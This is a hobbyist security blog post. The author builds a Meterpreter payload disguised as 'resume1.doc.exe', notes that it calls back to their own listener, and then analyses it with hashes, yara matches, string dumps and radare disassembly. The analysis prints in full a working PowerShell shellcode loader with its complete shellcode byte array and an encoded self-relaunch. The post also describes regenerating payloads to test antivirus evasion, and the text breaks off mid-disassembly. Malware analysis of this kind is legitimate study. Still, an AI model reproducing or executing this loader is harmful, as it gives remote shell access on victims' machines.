I've been playing with some ideas recently and it's actually kind of amusing the responses that I can get and identify the sources from. Lets start with one thing I generated with TheFatRat (basically wrapper for building metasploit compatible shells), testing the generation schemes I decided I would build some ways of doing this. Such as adding base64 of exec to one page and unicorn powershell script to another and using all that. Anyway, lets look:
5 minute easy mode analysis:
The gist of all that, is that it connected back to port 9008 on my server where I have an active meterpreter listener forwarded to. Pretty easy, not really a difficult analysis, really a 5 minute rush job. But, it does help me know that meterpreter launches that secondary payload when ran, that's pretty sweet, though everyone sort of knew that. But since launching this and a few other things online, I've received a number of hits on my shell from people looking at that port:
This last one is sort of amusing because it tells me they looked a little bit into my site:
Edit, I wanted to add more because it amuses me the comparison between ips connecting to my c2 port for my test malware versus the hosts connecting to my web server, not including tor nodes:
These are both things that have been scanned with virus total or other platforms for shits and giggles, but this draws a clear understanding that some do, and some don't use tor with their analysis.
But what are people trying to analyze? Well the miner one, with that particular notion at the end, was one provided in another post on this blog plus my own get data to it. This was specific to a url attempt put into virus total because I want to track who's tracking this. The diagfix is unrelated, but is a repeatedly regenerated (every 300 seconds) unicorn powershell payload. Did this for ease of use and testing the "fud" capabilities of TheFatRat. Honestly, it does a decent job of evading some shit, but anyone who looks at it for a split second would recognize it. Yara rules could easily determine it, or the exec form. You'll see in my above example I left out the meterpreter yara rules, this is because well, analysis without the answer provided to me.
Things I learned with this week of dickery:
5 minute easy mode analysis:
; Hashes unknownrahash2 -a all ./resume1.doc.exe./resume1.doc.exe: 0x00000000-0x000041ff md5: 90f7ee1bf4451349dfa7c518a8c6202a./resume1.doc.exe: 0x00000000-0x000041ff sha1: 0c214854fef6ac5c28f84bf07ee6d39eb3595d82./resume1.doc.exe: 0x00000000-0x000041ff sha256: ea2bb0a47fedb86127a59e71285f61036e1ff9c4e0a1d0fae6fe8f2931e4d5a6./resume1.doc.exe: 0x00000000-0x000041ff sha384: abfd2915e8b1bce3c871a8faec67b503599908c24ba08dfdcc8ca52c04560ec132328a31f53d4c8853ce12256488d0ad./resume1.doc.exe: 0x00000000-0x000041ff sha512: fac47672393b774135997b98c86874667a526bc40c8ab04745d4c28de3b1afdea9f8efc257a9e8e4f42d3341f065a81bde0fe93a220a3adae338a1776bb5a691./resume1.doc.exe: 0x00000000-0x000041ff crc16: 9f78./resume1.doc.exe: 0x00000000-0x000041ff crc32: 1b63e4bd./resume1.doc.exe: 0x00000000-0x000041ff md4: 282dcd274bd2efade3765ddff3ec65e1./resume1.doc.exe: 0x00000000-0x000041ff xor: eb./resume1.doc.exe: 0x00000000-0x000041ff xorpair: 3ad1./resume1.doc.exe: 0x00000000-0x000041ff parity: 00./resume1.doc.exe: 0x00000000-0x000041ff entropy: 03000000./resume1.doc.exe: 0x00000000-0x000041ff hamdist: 01./resume1.doc.exe: 0x00000000-0x000041ff pcprint: 2d./resume1.doc.exe: 0x00000000-0x000041ff mod255: 4d./resume1.doc.exe: 0x00000000-0x000041ff xxhash: 5924b386./resume1.doc.exe: 0x00000000-0x000041ff adler32: 913ba49c./resume1.doc.exe: 0x00000000-0x000041ff luhn: 00./resume1.doc.exe: 0x00000000-0x000041ff crc8smbus: 3f./resume1.doc.exe: 0x00000000-0x000041ff crc15can: 5a1d./resume1.doc.exe: 0x00000000-0x000041ff crc16hdlc: 4045./resume1.doc.exe: 0x00000000-0x000041ff crc16usb: a732./resume1.doc.exe: 0x00000000-0x000041ff crc16citt: 4b6a./resume1.doc.exe: 0x00000000-0x000041ff crc24: 7a1917./resume1.doc.exe: 0x00000000-0x000041ff crc32c: d18b15a4./resume1.doc.exe: 0x00000000-0x000041ff crc32ecma267: df97a7b0; yara matchesfind /yararules/ -type f -name "*.yar" -exec yara -r {} ./resume1.doc.exe \; 2>/dev/nullwithout_urls ./resume1.doc.exe_NET_executable__Microsoft_ ./resume1.doc.exe_yodas_Protector_v1033_dllocx__Ashkbiz_Danehkar_h_ ./resume1.doc.exe_NET_executable_ ./resume1.doc.exe_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe_First_Publisher_Graphics_format_ ./resume1.doc.exe_UPolyX_v05_ ./resume1.doc.exe_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe_NET_executable__Microsoft_ ./resume1.doc.exe_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe_NET_executable_ ./resume1.doc.exe_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe_NET_executable_ ./resume1.doc.exe_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exeNETexecutableMicrosoft ./resume1.doc.exeIsPE32 ./resume1.doc.exeIsNET_EXE ./resume1.doc.exeIsConsole ./resume1.doc.exeMicrosoft_Visual_Studio_NET ./resume1.doc.exeMicrosoft_Visual_C_v70_Basic_NET_additional ./resume1.doc.exeMicrosoft_Visual_C_Basic_NET ./resume1.doc.exeMicrosoft_Visual_Studio_NET_additional ./resume1.doc.exeMicrosoft_Visual_C_v70_Basic_NET ./resume1.doc.exeNET_executable_ ./resume1.doc.exeNET_executable ./resume1.doc.exedomain ./resume1.doc.exewithout_attachments ./resume1.doc.exewithout_urls ./resume1.doc.exewithout_images ./resume1.doc.exe_Microsoft_Visual_Cpp_v70_DLL_ ./resume1.doc.exewithout_images ./resume1.doc.exeIP ./resume1.doc.exewithout_attachments ./resume1.doc.execontentis_base64 ./resume1.doc.exe; stringsrabin2 -zz resume1.doc.exeMetadata Signature: 0x268 0x10001424a5342 12.NET Version: v4.0.30319Number of Metadata Streams: 5DirectoryAddress: 6c Size: f0Stream name: #~ 4DirectoryAddress: 15c Size: b8Stream name: #Strings 12DirectoryAddress: 214 Size: 3688Stream name: #US 4DirectoryAddress: 389c Size: 10Stream name: #GUID 8DirectoryAddress: 38ac Size: 38Stream name: #Blob 8vaddr=0x0000004d paddr=0x0000004d ordinal=000 sz=45 len=44 section=unknown type=ascii string=!This program cannot be run in DOS mode.\r\r\n$vaddr=0x000000a9 paddr=0x000000a9 ordinal=001 sz=24 len=5 section=unknown type=utf32le string=Y `䀀 blocks=Basic Latin,CJK Unified Ideographs Extension Avaddr=0x00000178 paddr=0x00000178 ordinal=002 sz=6 len=5 section=unknown type=ascii string=.textvaddr=0x0000019f paddr=0x0000019f ordinal=003 sz=7 len=6 section=unknown type=ascii string=`.rsrcvaddr=0x000001c7 paddr=0x000001c7 ordinal=004 sz=8 len=7 section=unknown type=ascii string=@.relocvaddr=0x00402056 paddr=0x00000256 ordinal=005 sz=5 len=4 section=.text type=ascii string=\n*2rvaddr=0x00402068 paddr=0x00000268 ordinal=006 sz=5 len=4 section=.text type=ascii string=BSJBvaddr=0x00402078 paddr=0x00000278 ordinal=007 sz=11 len=10 section=.text type=ascii string=v4.0.30319vaddr=0x00402088 paddr=0x00000288 ordinal=008 sz=24 len=5 section=.text type=utf32le string=lð縣Ŝ¸ blocks=Basic Latin,Latin-1 Supplement,CJK Unified Ideographs,Latin Extended-Avaddr=0x004020a0 paddr=0x000002a0 ordinal=009 sz=5 len=4 section=.text type=ascii string=ingsvaddr=0x004020bc paddr=0x000002bc ordinal=010 sz=6 len=5 section=.text type=ascii string=#GUIDvaddr=0x004020cc paddr=0x000002cc ordinal=011 sz=6 len=5 section=.text type=ascii string=#Blobvaddr=0x004021c5 paddr=0x000003c5 ordinal=012 sz=9 len=8 section=.text type=ascii string=<Module>vaddr=0x004021ce paddr=0x000003ce ordinal=013 sz=7 len=6 section=.text type=ascii string=pshcmdvaddr=0x004021d9 paddr=0x000003d9 ordinal=014 sz=7 len=6 section=.text type=ascii string=systemvaddr=0x004021e0 paddr=0x000003e0 ordinal=015 sz=11 len=10 section=.text type=ascii string=msvcrt.dllvaddr=0x004021ef paddr=0x000003ef ordinal=016 sz=7 len=6 section=.text type=ascii string=Objectvaddr=0x004021f6 paddr=0x000003f6 ordinal=017 sz=7 len=6 section=.text type=ascii string=Systemvaddr=0x004021fd paddr=0x000003fd ordinal=018 sz=6 len=5 section=.text type=ascii string=.ctorvaddr=0x00402203 paddr=0x00000403 ordinal=019 sz=5 len=4 section=.text type=ascii string=Mainvaddr=0x00402208 paddr=0x00000408 ordinal=020 sz=20 len=19 section=.text type=ascii string=csharpandpowershellvaddr=0x0040221c paddr=0x0000041c ordinal=021 sz=30 len=29 section=.text type=ascii string=RuntimeCompatibilityAttributevaddr=0x0040223a paddr=0x0000043a ordinal=022 sz=32 len=31 section=.text type=ascii string=System.Runtime.CompilerServicesvaddr=0x0040225a paddr=0x0000045a ordinal=023 sz=9 len=8 section=.text type=ascii string=mscorlibvaddr=0x00402263 paddr=0x00000463 ordinal=024 sz=24 len=23 section=.text type=ascii string=csharpandpowershell.exevaddr=0x0040227f paddr=0x0000047f ordinal=025 sz=4090 len=2045 section=.text type=utf16le string=powershell -window hidden -EncodedCommand JAB...ABvaddr=0x00403279 paddr=0x00001479 ordinal=026 sz=4090 len=2045 section=.text type=utf16le string=4A...MAvaddr=0x00404273 paddr=0x00002473 ordinal=027 sz=4090 len=2045 section=.text type=utf16le string=Yw...B9Avaddr=0x0040526d paddr=0x0000346d ordinal=028 sz=1698 len=848 section=.text type=utf16le string=Ds...==였꽆쑜镨멁 blocks=Basic Latin,Hangul Syllables,CJK Unified Ideographsvaddr=0x0040590f paddr=0x00003b0f ordinal=029 sz=6 len=5 section=.text type=ascii string=n'W]7vaddr=0x0040592a paddr=0x00003b2a ordinal=030 sz=23 len=22 section=.text type=ascii string=WrapNonExceptionThrowsvaddr=0x00405982 paddr=0x00003b82 ordinal=031 sz=12 len=11 section=.text type=ascii string=_CorExeMainvaddr=0x0040598e paddr=0x00003b8e ordinal=032 sz=12 len=11 section=.text type=ascii string=mscoree.dllvaddr=0x00406062 paddr=0x00003c62 ordinal=033 sz=28 len=13 section=.rsrc type=utf16le string=_VERSION_INFOvaddr=0x004060bc paddr=0x00003cbc ordinal=034 sz=22 len=10 section=.rsrc type=utf16le string=arFileInfovaddr=0x004060da paddr=0x00003cda ordinal=035 sz=24 len=11 section=.rsrc type=utf16le string=Translationvaddr=0x004060fe paddr=0x00003cfe ordinal=036 sz=30 len=14 section=.rsrc type=utf16le string=StringFileInfovaddr=0x00406122 paddr=0x00003d22 ordinal=037 sz=18 len=8 section=.rsrc type=utf16le string=007f04b0vaddr=0x0040613a paddr=0x00003d3a ordinal=038 sz=18 len=8 section=.rsrc type=utf16le string=Commentsvaddr=0x00406158 paddr=0x00003d58 ordinal=039 sz=22 len=10 section=.rsrc type=utf16le string=ompanyNamevaddr=0x0040617c paddr=0x00003d7c ordinal=040 sz=30 len=14 section=.rsrc type=utf16le string=ileDescriptionvaddr=0x004061a6 paddr=0x00003da6 ordinal=041 sz=24 len=11 section=.rsrc type=utf16le string=FileVersionvaddr=0x004061c0 paddr=0x00003dc0 ordinal=042 sz=16 len=7 section=.rsrc type=utf16le string=0.0.0.0vaddr=0x004061d6 paddr=0x00003dd6 ordinal=043 sz=26 len=12 section=.rsrc type=utf16le string=InternalNamevaddr=0x004061f0 paddr=0x00003df0 ordinal=044 sz=40 len=19 section=.rsrc type=utf16le string=csharpandpowershellvaddr=0x0040621e paddr=0x00003e1e ordinal=045 sz=30 len=14 section=.rsrc type=utf16le string=LegalCopyrightvaddr=0x00406248 paddr=0x00003e48 ordinal=046 sz=30 len=14 section=.rsrc type=utf16le string=egalTrademarksvaddr=0x00406272 paddr=0x00003e72 ordinal=047 sz=34 len=16 section=.rsrc type=utf16le string=OriginalFilenamevaddr=0x00406294 paddr=0x00003e94 ordinal=048 sz=48 len=23 section=.rsrc type=utf16le string=csharpandpowershell.exevaddr=0x004062ca paddr=0x00003eca ordinal=049 sz=24 len=11 section=.rsrc type=utf16le string=ProductNamevaddr=0x004062f0 paddr=0x00003ef0 ordinal=050 sz=28 len=13 section=.rsrc type=utf16le string=roductVersion; notepayload appears to be powershell payload with base64; not valid length by itselfJAB...AMAB; collecting base64 strings togetherJAB...==; writing decoded base64 to fileopen('resumebase64.decoded','wb').write("""JAB...==""".decode('base64')); strings from decoded base64rabin2 -zz resumebase64.decodedvaddr=0x00000000 paddr=0x00000000 ordinal=000 sz=4090 len=2045 section=unknown type=utf16le string=$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,vaddr=0x00000ffa paddr=0x00000ffa ordinal=001 sz=1110 len=555 section=unknown type=utf16le string=0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$0dX3,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));$iS0 = "-enc ";if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}; Investigating powershell$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$0dX3,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));$iS0 = "-enc ";if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}; saving hex as binary fileopen('resumehex.bin','wb').write("0xd9,...0xac".replace(',','').replace('0x','').replace(' ','').decode('hex')); radare from bin[0x00000000]> pD0x00000000 d9e9 fldl2t0x00000002 ba34683436 mov edx, 0x36346834: 0x00000007 d97424f4 fnstenv dword [rsp - 0xc]: 0x0000000b 5e pop rsi: 0x0000000c 33c9 xor ecx, ecx: 0x0000000e b147 mov cl, 0x47 ; 'G': 0x00000010 315618 xor dword [rsi + 0x18], edx: 0x00000013 83c604 add esi, 4: 0x00000016 035620 add edx, dword [rsi + 0x20]: 0x00000019 8ac1 mov al, cl: 0x0000001b caa0c8 retf -0x3760: 0x0000001e 2a33 sub dh, byte [rbx]: 0x00000020 30ada3d601ed xor byte [rbp - 0x12fe295d], ch: 0x00000026 d09331dd93f6 rcl byte [rbx - 0x96c22cf], 1: 0x0000002c bd96f6e236 mov ebp, 0x36e2f696: 0x00000031 dade fcmovu st(0), st(6): 0x00000033 05ff51392b add eax, 0x2b3951ff: 0x00000038 00c9 add cl, cl,===< 0x0000003a 792a jns 0x66|: 0x0000003c 82 invalid|: 0x0000003d 10ae8cbbdaa3 adc byte [rsi - 0x5c254474], ch|: 0x00000043 cdfc int 0xfc|: 0x00000045 07 invalid|: 0x00000046 499f lahf|: 0x00000048 55 push rbp|: 0x00000049 43fc cld|: 0x0000004b 30d2 xor dl, dl|: 0x0000004d 193dbaa88c45 sbb dword [0x458ca90d], edi|: 0x00000053 5f pop rdi|`==< 0x00000054 78ae js 4|.--> 0x00000056 64 invalid|: 0x00000057 ce invalid|:,=< 0x00000058 f3e9a6f0d081 jmp 0xffffffff81d0f104|:| 0x0000005e ee out dx, al|:| 0x0000005f ea invalid|:| 0x00000060 35afb9818d xor eax, 0x8d81b9af|:| 0x00000065 5b pop rbx`---> 0x00000066 3840dc cmp byte [rax - 0x24], al ; [0x2:1]=186:| 0x00000069 a4 movsb byte [rdi], byte ptr [rsi]:| 0x0000006a 97 xchg eax, edi:| 0x0000006b ad lodsd eax, dword [rsi]:| 0x0000006c d156e9 rcl dword [rsi - 0x17], 1:| 0x0000006f ea invalid:| 0x00000070 d5 invalid:| 0x00000071 889c022634a7. mov byte [rdx + rax - 0x2f58cbda], bl:| 0x00000078 55 push rbp:,=< 0x00000079 e222 loop 0x9d:|| 0x0000007b c3 ret:|| 0x0000007c fd std:|| 0x0000007d 61 invalid:|| 0x0000007e 94 xchg eax, esp:|| 0x0000007f 2f invalid:|| 0x00000080 fc cld:|| 0x00000081 a6 cmpsb byte [rsi], byte ptr [rdi] ; [0x2700000000:1]=255 ; 167503724544:|| 0x00000082 43bbf20307e3 mov r11d, 0xe30703f2:|| 0x00000088 16 invalid ; 0xe30703f2:|| 0x00000089 95 xchg eax, ebp:|| 0x0000008a c4 invalid:|| 0x0000008b 9f lahf:|| 0x0000008c 221e and bl, byte [rsi],===< 0x0000008e eb4f jmp 0xdf|:|| 0x00000090 a364c84be83f. movabs dword [0x54cd713fe84bc864], eax ; [0x54cd713fe84bc864:4]=-1|:|| 0x00000099 91 xchg eax, ecx|:|| 0x0000009a 8e0d374e2b45 mov cs, word [0x452b4ed7] ; [0x452b4ed7:2]=0xffff|:| 0x000000a0 d5 invalid ; [0x452b4ed7:2]=0xffff|:| 0x000000a1 9b wait|:| 0x000000a2 4604b1 add al, 0xb1|:| 0x000000a5 686bb741e7 push -0x18be4895|:| 0x000000aa fc cld|:| 0x000000ab c4 invalid|`==< 0x000000ac 73a8 jae 0x56| | 0x000000ae 56 push rsi| | 0x000000af 43 invalid| .-> 0x000000b0 3f invalid| :| 0x000000b1 217194 and dword [rcx - 0x6c], esi| :| 0x000000b4 4018c5 sbb bpl, al| :| 0x000000b7 0abfa336027b or bh, byte [rdi + 0x7b0236a3]| :| 0x000000bd f7663c mul dword [rsi + 0x3c]| :| 0x000000c0 aa stosb byte [rdi], al| `=< 0x000000c1 78ed js 0xb0| | 0x000000c3 bc53ad98b6 mov esp, 0xb698ad53| | 0x000000c8 c3 ret| | 0x000000c9 96 xchg eax, esi| | 0x000000ca 6a77 push 0x77 ; 'w'| ,=< 0x000000cc 714f jno 0x11d| || 0x000000ce 97 xchg eax, edi|,==< 0x000000cf 7756 ja 0x127|||| 0x000000d1 bf1e91c8ef mov edi, 0xefc8911e,====< 0x000000d6 700e jo 0xe6||||| 0x000000d8 a85f test al, 0x5f ; '_'||||| 0x000000da 31fe xor esi, edi||||| 0x000000dc 408abe2170b5. mov dil, byte [rsi + 0x14b57021] ; [0x14b57021:1]=255| ||| 0x000000e3 4a1a5ac1 sbb bl, byte [rdx - 0x3f]||| 0x000000e7 22b2c348b823 and dh, byte [rdx + 0x23b848c3]||| 0x000000ed 0b47c4 or eax, dword [rdi - 0x3c]||| 0x000000f0 63 invalid||| 0x000000f1 8764382d xchg dword [rax + rdi + 0x2d], esp||| 0x000000f5 60 invalid||| 0x000000f6 002a add byte [rdx], ch||| 0x000000f8 d9805f104f9e fld dword [rax - 0x61b0efa1],===< 0x000000fe 753f jne 0x13f; changed to 32 bitradare2 -b 32 resumehex.bin[0x00000000]> pD0x00000000 d9e9 fldl2t0x00000002 ba34683436 mov edx, 0x36346834: 0x00000007 d97424f4 fnstenv dword [esp - 0xc]: 0x0000000b 5e pop esi: 0x0000000c 33c9 xor ecx, ecx: 0x0000000e b147 mov cl, 0x47 ; 'G': 0x00000010 315618 xor dword [esi + 0x18], edx: 0x00000013 83c604 add esi, 4: 0x00000016 035620 add edx, dword [esi + 0x20]: 0x00000019 8ac1 mov al, cl: 0x0000001b caa0c8 retf -0x3760: 0x0000001e 2a33 sub dh, byte [ebx]: 0x00000020 30ada3d601ed xor byte [ebp - 0x12fe295d], ch: 0x00000026 d09331dd93f6 rcl byte [ebx - 0x96c22cf], 1: 0x0000002c bd96f6e236 mov ebp, 0x36e2f696: 0x00000031 dade fcmovu st(0), st(6): 0x00000033 05ff51392b add eax, 0x2b3951ff: 0x00000038 00c9 add cl, cl,====< 0x0000003a 792a jns 0x66|: 0x0000003c 82 invalid|: 0x0000003d 10ae8cbbdaa3 adc byte [esi - 0x5c254474], ch|: 0x00000043 cdfc int 0xfc|: 0x00000045 07 pop es|: 0x00000046 49 dec ecx|: 0x00000047 9f lahf|: 0x00000048 55 push ebp|: 0x00000049 43 inc ebx|: 0x0000004a fc cld|: 0x0000004b 30d2 xor dl, dl|: 0x0000004d 193dbaa88c45 sbb dword [0x458ca8ba], edi|: 0x00000053 5f pop edi|`===< 0x00000054 78ae js 4| 0x00000056 64ce into| ,==< 0x00000058 f3e9a6f0d081 jmp 0x81d0f104| | 0x0000005e ee out dx, al| |,=< 0x0000005f ea35afb9818d. ljmp 0x5b8d:0x81b9af35`----> 0x00000066 3840dc cmp byte [eax - 0x24], al ; [0x2:1]=186|:| 0x00000069 a4 movsb byte es:[edi], byte ptr [esi]|:| 0x0000006a 97 xchg eax, edi|:| 0x0000006b ad lodsd eax, dword [esi]|:| 0x0000006c d156e9 rcl dword [esi - 0x17], 1,==< 0x0000006f ead5889c0226. ljmp 0x3426:0x29c88d5||:| 0x00000076 a7 cmpsd dword [esi], dword ptr es:[edi] ; [0x170000001c:4]=-1 ; 98784247836||:| 0x00000077 d055e2 rcl byte [ebp - 0x1e], 1||:| 0x0000007a 22c3 and al, bl||:| 0x0000007c fd std||:| 0x0000007d 61 popal||:| 0x0000007e 94 xchg eax, esp||:| 0x0000007f 2f das||:| 0x00000080 fc cld||:| 0x00000081 a6 cmpsb byte [esi], byte ptr es:[edi] ; [0x170000001c:1]=255 ; 98784247836||:| 0x00000082 43 inc ebx||:| 0x00000083 bbf20307e3 mov ebx, 0xe30703f2||:| 0x00000088 16 push ss||:| 0x00000089 95 xchg eax, ebp||:| 0x0000008a c49f221eeb4f les ebx, [edi + 0x4feb1e22]||:| 0x00000090 a364c84be8 mov dword [0xe84bc864], eax ; [0xe84bc864:4]=-1||:| 0x00000095 3f aas||`=< 0x00000096 71cd jno 0x65||| 0x00000098 54 push esp||| 0x00000099 91 xchg eax, ecx||| 0x0000009a 8e0d374e2b45 mov cs, word [0x452b4e37] ; [0x452b4e37:2]=0xffff||| 0x000000a0 d59b aad 0x9b||| 0x000000a2 46 inc esi||| 0x000000a3 04b1 add al, 0xb1||| 0x000000a5 686bb741e7 push 0xe741b76b||| 0x000000aa fc cld||| 0x000000ab c473a8 les esi, [ebx - 0x58]||| 0x000000ae 56 push esi||| 0x000000af 43 inc ebx||.-> 0x000000b0 3f aas||:| 0x000000b1 217194 and dword [ecx - 0x6c], esi||:| 0x000000b4 40 inc eax||:| 0x000000b5 18c5 sbb ch, al||:| 0x000000b7 0abfa336027b or bh, byte [edi + 0x7b0236a3]||:| 0x000000bd f7663c mul dword [esi + 0x3c]||:| 0x000000c0 aa stosb byte es:[edi], al||`=< 0x000000c1 78ed js 0xb0||| 0x000000c3 bc53ad98b6 mov esp, 0xb698ad53||| 0x000000c8 c3 ret||| 0x000000c9 96 xchg eax, esi||| 0x000000ca 6a77 push 0x77 ; 'w' ; 119||,=< 0x000000cc 714f jno 0x11d|||| 0x000000ce 97 xchg eax, edi,===< 0x000000cf 7756 ja 0x127||||| 0x000000d1 bf1e91c8ef mov edi, 